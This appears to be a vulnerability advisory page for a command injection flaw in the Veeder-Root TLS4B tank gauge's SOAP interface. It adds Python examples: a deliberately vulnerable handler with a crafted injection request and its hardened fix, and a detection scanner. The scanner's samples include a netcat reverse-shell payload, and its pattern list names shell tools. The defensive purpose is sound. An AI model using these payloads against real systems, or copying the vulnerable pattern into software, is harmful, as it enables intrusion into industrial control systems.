CVE-2025-58428
Published: 23 October 2025
Summary
CVE-2025-58428 is a critical-severity Command Injection (CWE-77) vulnerability in the Veeder-Root TLS4B automatic tank gauge (ATG) system. Its CVSS 4.0 base score is 9.4 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 19.3% of all CVEs by EPSS exploit likelihood and is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
The strongest mitigations our analysis identified are NIST 800-53 AC-6 (Least Privilege) and SI-10 (Information Input Validation).
Deeper analysis
The TLS4B ATG system contains a command injection vulnerability (CWE-77) in its SOAP-based interface, which is exposed through the web services handler. Parameter values taken from SOAP requests reach system-level commands on the underlying Linux environment without adequate neutralization. The CVSS 4.0 score of 9.4 reflects network-accessible exploitation with low attack complexity; valid credentials are required.
An authenticated remote attacker can therefore supply crafted SOAP requests to execute arbitrary system-level commands, obtain a full interactive shell, and use the compromised host as a foothold for lateral movement inside the network.
CISA advisory ICSA-25-296-03 and Veeder-Root's own notices direct administrators to apply the remediation steps and the updated software packages available on the Veeder-Root downloads portal. The EPSS score has remained flat at 0.0138 (1.38%) with no observed increase since disclosure.
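To make the vulnerability class concrete, here is an added Python example. It is not Veeder-Root code and does not reproduce the real TLS4B web services schema: the RunDiagnostic operation, its target parameter and the urn:example-atg namespace are invented stand-ins. It shows a handler that splices a SOAP parameter into a shell command line, the crafted request that abuses it, and a hardened handler that applies allowlist input validation (SI-10) and executes the tool as an argv list with no shell, which is the form the page's mitigating controls call for. The diagnostic binary is replaced by echo so the example runs harmlessly.

```python
import re
import subprocess
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
APP_NS = "urn:example-atg"   # hypothetical namespace, not the real TLS4B schema


def soap_request(target: str) -> bytes:
    """Build a constructed SOAP request; RunDiagnostic/target are invented names."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="{SOAP_NS}" xmlns:atg="{APP_NS}">
  <soap:Body>
    <atg:RunDiagnostic>
      <atg:target>{target}</atg:target>
    </atg:RunDiagnostic>
  </soap:Body>
</soap:Envelope>""".encode()


def extract_target(body: bytes) -> str:
    """Pull the target parameter out of the envelope (use defusedxml on real input)."""
    root = ET.fromstring(body)
    el = root.find(f".//{{{APP_NS}}}target")
    if el is None or not el.text:
        raise ValueError("missing target parameter")
    return el.text


def vulnerable_handler(body: bytes) -> str:
    """CWE-77 pattern: the parameter text is spliced into a shell command line.

    'echo' stands in for the real diagnostic binary so the example is harmless;
    everything after an injected ';' still runs as a second shell command.
    """
    target = extract_target(body)
    proc = subprocess.run(f"echo ping -c 1 {target}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


# Allowlist: a hostname-like token only (letters, digits, dot, hyphen).
TARGET_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def is_valid_target(value: str) -> bool:
    """SI-10: allowlist the parameter syntax rather than blocklisting metacharacters."""
    return TARGET_RE.fullmatch(value) is not None


def hardened_handler(body: bytes) -> str:
    """Validated parameter passed as its own argv element; no shell ever parses it."""
    target = extract_target(body)
    if not is_valid_target(target):
        raise ValueError(f"rejected target parameter: {target!r}")
    # Separate argv entries mean shell metacharacters in target are inert.
    # The web services handler itself should run as an unprivileged account
    # (AC-6) so that even a future bypass cannot yield root; that is an OS
    # configuration step outside this snippet.
    proc = subprocess.run(["echo", "ping", "-c", "1", target],
                          capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    payload = soap_request("eth0; echo INJECTED")   # constructed attack request
    print("vulnerable:", vulnerable_handler(payload).splitlines())
    try:
        hardened_handler(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

The vulnerable handler returns two lines for the constructed payload, the second produced by the injected command; the hardened handler rejects the same payload before any process is spawned and still serves the legitimate value.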
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-35717
Vulnerability details
The TLS4B ATG system's SOAP-based interface is vulnerable due to its accessibility through the web services handler. This vulnerability enables remote attackers with valid credentials to execute system-level commands on the underlying Linux system. This could allow the attacker to achieve remote command execution, full shell access, and potential lateral movement within the network.
- CWE(s): CWE-77 (Command Injection)
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Command injection in the exposed SOAP web service maps to Exploit Public-Facing Application (T1190), and the resulting execution of arbitrary commands on the Linux host maps to Command and Scripting Interpreter: Unix Shell (T1059.004).
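The same mapping can be turned into a detection. The following added Python example (not from the page, the vendor or CISA) scans captured SOAP request bodies for shell metacharacters and common post-exploitation idioms in parameter values, which is what an attempt at T1190 leading to T1059.004 looks like on the wire. The sample bodies are constructed, and the RunDiagnostic and target element names are invented; the scanner itself is generic and inspects every text node in the body, so it does not depend on knowing the real schema.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Patterns that should never appear in an ATG parameter value. A hit is a
# strong signal of an attempt to turn the public-facing SOAP interface (T1190)
# into Unix shell command execution (T1059.004).
SHELL_PATTERNS = [
    (re.compile(r"[;&|`]"), "shell separator, pipe or backtick"),
    (re.compile(r"\$\(|\$\{"), "command or variable substitution"),
    (re.compile(r"/dev/tcp/"), "bash reverse-shell idiom"),
    (re.compile(r"(?:^|[\s/])(?:sh|bash|nc|ncat|curl|wget|python3?|perl)(?:\s|$)"),
     "post-exploitation binary name"),
]


@dataclass
class Finding:
    record: int      # 1-based index of the captured request body
    element: str     # local name of the element whose text matched
    value: str       # the offending parameter value
    reason: str      # which pattern fired


def text_nodes(body_xml: str):
    """Yield (local-name, text) for every non-empty text node in a SOAP body."""
    root = ET.fromstring(body_xml)
    for el in root.iter():
        if el.text and el.text.strip():
            yield el.tag.rsplit("}", 1)[-1], el.text.strip()


def scan_soap_bodies(bodies):
    """Return one Finding per suspicious body (first matching node and pattern)."""
    findings = []
    for idx, body in enumerate(bodies, 1):
        try:
            nodes = list(text_nodes(body))
        except ET.ParseError:
            # Malformed XML against a SOAP endpoint is itself worth a look.
            findings.append(Finding(idx, "?", body[:60], "malformed XML"))
            continue
        for name, value in nodes:
            for pattern, reason in SHELL_PATTERNS:
                if pattern.search(value):
                    findings.append(Finding(idx, name, value, reason))
                    break
            else:
                continue
            break
    return findings


# Constructed sample bodies: one benign request, one separator-based injection
# with a reverse shell, one command substitution. Names are invented.
_ENV = ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:atg="urn:example-atg"><soap:Body><atg:RunDiagnostic>'
        '<atg:target>{}</atg:target></atg:RunDiagnostic></soap:Body></soap:Envelope>')
SAMPLE_BODIES = [
    _ENV.format("eth0"),
    _ENV.format("eth0; nc -e /bin/sh 203.0.113.5 4444"),
    _ENV.format("$(id)"),
]


if __name__ == "__main__":
    for f in scan_soap_bodies(SAMPLE_BODIES):
        print(f"record {f.record}: <{f.element}> {f.value!r} -> {f.reason}")
```

Request bodies are rarely in default web server logs, so feed the scanner from whatever does capture them in front of the ATG: a reverse proxy with body logging, a WAF, or a packet capture. A finding tied to an authenticated session is the condition to alert on for this CVE, since the vulnerability requires valid credentials.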
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): directly mitigates the command injection vulnerability by requiring timely application of the vendor patches or updates specified in CISA ICSA-25-296-03.
- SI-10 (Information Input Validation): prevents exploitation of the SOAP interface command injection by validating and sanitizing all information inputs, including the parameters of command messages, before they reach the operating system.
- AC-6 (Least Privilege): limits the impact of exploitation by ensuring the web services handler and the underlying Linux processes it spawns run with least privilege, restricting what an injected system-level command can do.